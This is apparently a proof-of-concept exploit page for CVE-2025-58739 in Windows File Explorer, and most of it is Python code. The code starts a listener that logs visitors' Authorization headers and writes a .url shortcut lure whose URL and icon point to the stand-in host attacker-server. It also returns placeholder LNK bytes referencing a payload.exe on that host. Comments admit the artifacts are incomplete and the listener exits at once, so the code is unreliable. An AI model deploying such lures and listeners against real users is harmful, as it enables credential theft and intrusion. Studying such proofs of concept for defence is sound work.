Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network.
The following code is for security research and authorized testing only.
# CVE-2025-58739 - Windows File Explorer Information Disclosure / Spoofing PoC
# This PoC demonstrates the concept of exploiting the File Explorer information disclosure vulnerability
# Note: This is a conceptual demonstration for educational purposes only
import os
import sys
import http.server
import socketserver
import threading
from urllib.parse import urlparse
# Step 1: Listener that records what a connecting client sends.
# Note: this is a plain HTTP server, not the SMB/WebDAV server the write-up
# refers to; it only logs request metadata to stdout and answers with stub bytes.
class MaliciousHandler(http.server.SimpleHTTPRequestHandler):
    """Log each GET request's origin and headers, then reply with stub bytes.

    Logged to stdout: the client IP, the request path, the ``User-Agent``
    header and the raw ``Authorization`` header (``'None'`` when absent).
    Because the ``Authorization`` value is printed verbatim, any credential
    material a client sends ends up in the console/log - treat that output
    as sensitive. The response is always ``200`` with
    ``Content-Type: application/octet-stream`` and the body returned by
    :meth:`generate_malicious_lnk`.
    """

    def do_GET(self):
        """Record the request on stdout, then send the stub response."""
        self._log_request()
        self._send_stub()

    def _log_request(self):
        # Only request metadata is captured; the request body is never read.
        origin = self.client_address[0]
        fields = (
            (" Path", self.path),
            (" User-Agent", self.headers.get('User-Agent', 'Unknown')),
            (" Auth Header", self.headers.get('Authorization', 'None')),
        )
        print(f"[+] Captured request from {origin}")
        for label, value in fields:
            print(f"{label}: {value}")

    def _send_stub(self):
        # Fixed 200/octet-stream reply regardless of the requested path.
        self.send_response(200)
        self.send_header('Content-Type', 'application/octet-stream')
        self.end_headers()
        self.wfile.write(self.generate_malicious_lnk())

    def generate_malicious_lnk(self):
        """Return the placeholder bytes used as the response body.

        As the original comment states, this is conceptual: four magic
        bytes, four header bytes and a UNC-style path appended directly. It
        is not a complete shell-link structure and is only a stand-in for
        the artifact the write-up describes.
        """
        return b''.join((
            b'\x4c\x00\x00\x00',                          # LNK magic / header-size bytes
            b'\x01\x14\x02\x00',                          # placeholder header bytes
            b'\\\\attacker-server\\share\\payload.exe',   # placeholder UNC target
        ))
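def start_listener(port=8080, host="0.0.0.0"):
    """Serve ``MaliciousHandler`` on ``(host, port)`` until the process ends.

    Args:
        port: TCP port to listen on.
        host: Interface to bind. The default keeps the original behaviour
            (every interface); pass ``"127.0.0.1"`` to confine a lab run to
            the local machine so the listener is not reachable from the
            network.

    Blocks inside ``serve_forever``; the ``with`` block closes the listening
    socket when the server is shut down or the block is left by exception.
    """
    with socketserver.TCPServer((host, port), MaliciousHandler) as httpd:
        print(f"[*] Listener started on port {port}")
        httpd.serve_forever()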
# Step 2: Write the .url artifact that pairs with the listener above.
def create_malicious_payload(output_path):
    """Write an ``[InternetShortcut]`` file to ``output_path``.

    Both ``URL`` and ``IconFile`` are ``file:`` references to a UNC-style
    path on the placeholder host ``attacker-server``. The content is
    reproduced byte-for-byte from the original; the file is opened in text
    mode with the platform default encoding and is overwritten if present.
    """
    shortcut_lines = (
        "[InternetShortcut]",
        "URL=file:\\\\\\attacker-server\\\\share\\\\document.docx",
        "IconIndex=0",
        "IconFile=file:\\\\\\attacker-server\\\\share\\\\icon.ico",
    )
    # Trailing newline matches the original triple-quoted literal.
    url_content = "\n".join(shortcut_lines) + "\n"
    with open(output_path, 'w') as shortcut:
        shortcut.write(url_content)
    print(f"[+] Malicious payload saved to {output_path}")
# Step 3: Demonstrate the attack
# Entry point: prints a banner, starts the listener on a background thread,
# writes the .url artifact into the current working directory, and prints the
# narrative of the flow. Nothing here sends anything to a victim.
if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-58739 - Windows File Explorer Spoofing PoC")
    print("Conceptual demonstration - For educational use only")
    print("=" * 60)
    # Start the listener in a separate thread
    # NOTE(review): the thread is daemon=True and is never joined, so the
    # listener lives only until the prints below finish and the main thread
    # exits; as written, the server is effectively never reachable.
    listener_thread = threading.Thread(target=start_listener, args=(8080,), daemon=True)
    listener_thread.start()
    # Create the malicious payload (written relative to the current directory)
    create_malicious_payload("malicious_payload.url")
    # Defender's reading of the same flow: the observable is an outbound
    # connection from Explorer to an untrusted host right after a shortcut is
    # opened; egress filtering of SMB/WebDAV and the vendor update named in the
    # last line are the mitigations.
    print("\n[*] Attack flow:")
    print(" 1. Attacker hosts malicious server (this script)")
    print(" 2. Attacker sends malicious .url or .lnk file to victim")
    print(" 3. Victim opens the file in Windows File Explorer")
    print(" 4. File Explorer connects to attacker's server")
    print(" 5. Sensitive information (paths, credentials) is leaked")
    print(" 6. Attacker uses leaked info for further exploitation")
    print("\n[!] Apply Microsoft security updates to mitigate this vulnerability")